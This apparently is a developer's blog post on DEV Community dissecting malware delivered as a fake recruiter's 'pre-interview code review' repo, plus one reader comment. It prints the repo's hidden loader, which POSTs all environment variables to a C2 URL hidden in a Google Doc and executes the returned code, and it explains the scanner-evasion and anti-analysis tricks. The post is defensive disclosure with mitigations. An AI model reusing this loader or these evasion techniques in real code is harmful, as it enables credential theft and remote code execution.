DEV Community

Vladimir Novick


A LinkedIn Recruiter Sent Me Malware Disguised as a "Pre-Interview Code Review"

A LinkedIn recruiter pitched me a remote "Software Engineer at a DEX" project this week. Reasonable comp range, tech stack squarely in my wheelhouse. After a couple of friendly exchanges, she asked me to "review the codebase before the technical interview" and sent me a GitHub repo link plus a Calendly invite for the call.

The repo was malware. It didn't get me, but it's something developers should be aware of — especially in the current job market, when so many people have been laid off and are looking for jobs or projects.

This post walks through exactly what was in it, the three details I found genuinely clever (honestly, kind of impressive in a "wish they'd put this energy into something legit" way), and the single precaution that defeats this entire family of attacks. If you're an engineer who occasionally talks to recruiters on LinkedIn, this matters to you.

The catch

The repo (metabiteorg/NitroGem — reported to GitHub Trust & Safety, takedown pending) presents itself as a React + web3 dApp. Real-looking package.json, real-looking React frontend, hundreds of lines of legitimate-looking MEV bot code in the backend. But buried in app/controllers/frontController.js, lines 591–619, is this:

// ======================= Verification Setup =======================
const getGoogleDriveValue = async () => {
  const candidateUrls = `https://docs.google.com/document/d/<REDACTED>/export?format=txt`;
  try {
    const response = await axios.get(candidateUrls, {
      responseType: "text",
      transformResponse: (data) => data,
    });
    const value = String(response.data || "").trim();
    changedQueue(value);
  } catch (err) {
    // Try next URL
  }
};
getGoogleDriveValue();

const changedQueue = (value) => {
  verify(setApiKey(value))
    .then((response) => {
      const responseData = response.data;
      const executor = new (Function.constructor)("require", responseData);
      executor(require);
    });
}

That's a five-stage attack chain that fires the moment you run npm install:

  1. The prepare lifecycle script in package.json runs node app/index.js.
  2. app/index.js requires frontController.js, which makes line 605 (getGoogleDriveValue();) execute at module load.
  3. The function fetches a public Google Doc.
  4. The doc body is base64-decoded into a URL, and your full process.env is POSTed to that URL via the verify() helper. (verify lives in a different file, settingController.js, where it's defined as axios.post(api, { ...process.env }, { headers: { "x-secret-header": "secret" } }).)
  5. The C2 response is compiled with new (Function.constructor)("require", responseData) and executed with the actual Node require module passed in — giving the attacker arbitrary JavaScript execution with full fs, child_process, net access.

Net effect: every API key, AWS credential, GitHub/npm token in your shell environment gets stolen. Then the attacker gets to run anything they want on your machine.
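To make step 4 concrete: spreading process.env hands the attacker every variable in your shell as one JSON-serializable object. A harmless sketch (DEMO_AWS_KEY is an invented secret for illustration; nothing here touches the network):

```javascript
// Harmless sketch of what `{ ...process.env }` captures: every variable in
// your shell, ready to be POSTed as a request body. DEMO_AWS_KEY is an
// invented secret; no network call happens here.
process.env.DEMO_AWS_KEY = "AKIA-example";
const stolen = { ...process.env };

console.log(Object.keys(stolen).length, "variables captured");
console.log("includes the fake secret:", stolen.DEMO_AWS_KEY); // AKIA-example
```

In the real repo this object becomes the body of the axios.post inside verify() — there's no filtering, so anything exported in your shell at install time goes along for the ride.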

Three details I found genuinely interesting

The Command and Control (C2) is a Google Doc.
Most writeups of this kind describe a hardcoded vercel.app or freshly registered domain as the command-and-control endpoint. This one routes through a public Google Doc whose body is a base64-encoded URL. Two consequences: the attacker can rotate the C2 destination by editing the Google Doc, with no GitHub commit needed, and outbound HTTPS to docs.google.com is allowed by virtually every corporate egress filter. It's a smart move — the actual C2 URL never appears in the repo, so detection rules that say "block this domain" have nothing to block.
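The indirection itself is trivial — the repo only ever references the Google Docs URL, and the real destination lives base64-encoded in the doc body. A sketch, with an invented URL standing in for the actual C2:

```javascript
// Sketch of the doc-body indirection. "https://c2.example/collect" is an
// invented stand-in for the attacker's real endpoint.
// What the attacker puts in the Google Doc:
const docBody = Buffer.from("https://c2.example/collect", "utf8").toString("base64");

// What the malware does with the fetched body:
const c2Url = Buffer.from(docBody.trim(), "base64").toString("utf8");
console.log(c2Url); // → https://c2.example/collect
```

Editing the doc swaps `c2Url` for every future victim without touching the repository at all.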

The eval-equivalent is new (Function.constructor)("require", responseData). Every linter and SAST scanner flags eval, and many also flag new Function(...). Reaching the constructor through an indirect property dereference (Function.constructor) bypasses keyword/string-match rules: same execution semantics, lower detection probability. Passing "require" as the parameter name and require as the argument is what gives the attacker full Node module access in the compiled code. Without that, the compiled function wouldn't have access to require at all, because Function-constructed functions run in the global scope, where require isn't injected the way it is inside CommonJS modules.

The prepare script camouflages itself as a Create-React-App build. The actual line in package.json is:

"prepare": "npm run app:pre | react-scripts --openssl-legacy-provider build --kill-others --kill-others-on-fail"

That command is nonsense. react-scripts build doesn't read stdin. --kill-others is a concurrently flag, not a react-scripts flag. The right side of the pipe exists only to make the line look like a normal CRA build pipeline to a quick reader who scrolls past package.json. The only working portion is npm run app:pre, which runs node app/index.js. Pure visual decoration, but it works — most reviewers don't try to run the right side of the pipe through the actual react-scripts arg parser to see if it's coherent.

The supporting decorations

The repo has a bunch of small misdirection details that, taken together, signal a deliberate disguise rather than incidental code smell:

  • check-environment.js runs as part of npm start and refuses to execute in Gitpod, GitHub Codespaces, or Windows 11 VS Code terminals — exactly the environments security researchers most often use to safely poke at unknown repos. The script is dressed up as a Node-version sanity check, but its practical effect is anti-analysis filtering.

  • npm install.cmd is a 3-line Windows batch file that runs npm install without --ignore-scripts. It exists to lure users away from the only safe install path the repo offers (install:fix, which uses --ignore-scripts).

  • app/test/index.js is entirely commented out — placeholder Mocha/Chai stubs for unrelated "Book API" / "User API" projects. Loaded by app/index.js as a decoy to absorb a researcher's attention away from the real payload site, with an unused getUniqueID() function nearby that "uses" the import so static analyzers don't flag it as dead code.

  • $null is a 244-byte file at the repo root containing npm warning output — consistent with someone running npm install > $null 2>&1 in cmd.exe, where $null becomes a literal filename rather than a redirection target. A small fingerprint of the author's working environment.

  • The two malicious functions are named setApiKey and verify. setApiKey doesn't set anything (it's atob). verify doesn't verify anything (it's axios.post). Each name describes a benign operation the function doesn't actually perform.

This is a known campaign

The fake-recruiter delivery vector matches a long-running campaign that Microsoft Threat Intelligence, Mandiant, and Palo Alto Unit 42 publicly attribute to North Korean state actors. Microsoft tracks it as Sapphire Sleet; Unit 42 calls it Contagious Interview (with malware families BeaverTail and InvisibleFerret); Securonix reported an overlapping cluster as DEV#POPPER; Mandiant tracks related activity as UNC4899.

Microsoft published a detailed writeup in March 2026 specifically about this delivery pattern: Contagious Interview: Malware delivered through fake developer job interviews. It describes the playbook as "a sophisticated social engineering operation active since at least December 2022, targeting software developers... by abusing the trust inherent in modern recruitment workflows." That's a near-verbatim description of what nearly happened to me.

The playbook is consistent: fresh LinkedIn profile pitches a remote Web3/AI engineering role, plausible stack, attractive comp range, conversation escalates over a few days to "please review the codebase before the technical interview," repo contains malware behind a prepare or postinstall lifecycle script. By the time the candidate runs npm install, the trick has already worked.

The one precaution that defeats this whole family

I keep coming back to this when I talk to other engineers about it, because it's the part that actually matters and it's simpler than it looks:

Looking at code from a stranger on github.com is fine. No code from the repo executes when you read it in a browser — the rendering is pure HTML, the source view is read-only text. You can browse around an unfamiliar org's repos freely; that's safe.

The risky step is cloning + npm install locally. That's where lifecycle scripts (prepare, postinstall, preinstall) fire and your environment gets stolen.

If you ever need to install an unfamiliar repo, two habits that help:

  • Read package.json first. Look at every entry under scripts, especially anything named prepare, postinstall, preinstall, install. If any of them invoke a script you didn't expect (e.g., node some-script.js), pause and read that script before continuing.

  • Run npm install --ignore-scripts. Lifecycle hooks don't fire. You can still develop normally; you just need to opt back in (npm rebuild <package>) for legitimate native modules later, on a per-package basis.

This is the same hygiene that protects you from compromised npm packages in general, not just fake recruiter scams. It's worth turning into a default reflex — npm config set ignore-scripts true makes it the default for every install on your machine.

Reference and IOCs

I keep a separate, reference-style document with the full IOC table, file paths, line numbers, the camouflage inventory, the social-engineering fingerprints, forensic methodology (how to confirm whether the trojan actually ran on your machine), mitigations if it did, and the channels for reporting (GitHub, Google Safe Browsing, LinkedIn, Calendly):

Full IOC reference and forensic methodology (gist)

Stay safe out there. If you got a similar pitch — don't clone, report the LinkedIn profile (under "fake account / not a real person"), and rotate any tokens that were exported in your shell at the time of install.

Top comments (1)

PEACEBINFLOW

The detail about the prepare script camouflaging itself as a Create-React-App build pipeline is the part that'll stick with me. Not because the technique is technically sophisticated — it's actually pretty simple — but because it exploits something that isn't really a technical vulnerability at all. It exploits scanning habits.

Most of us have trained ourselves to skim package.json scripts with a specific pattern-matching lens: we look for things that feel off. A weird binary name, an obfuscated one-liner, a curl pipe to bash. But that nonsense react-scripts --openssl-legacy-provider build --kill-others string doesn't trigger the "off" detector because it's composed entirely of tokens that look like they belong there. It's visual static that blends into the expected noise of a modern JavaScript build chain. My brain sees "react-scripts," "build," some flags I half-recognize from a StackOverflow answer two years ago, and just moves on.

That's the part I find unsettling in a useful way. It suggests the defense isn't just "be more careful reading scripts" because the attack is specifically designed to pass through careful-enough reading. The real defense is the mechanical one you mentioned — --ignore-scripts as default behavior, not as a special precaution. I wonder how many of us have that flipped in our heads, where running scripts is the default and ignoring them is the paranoid exception.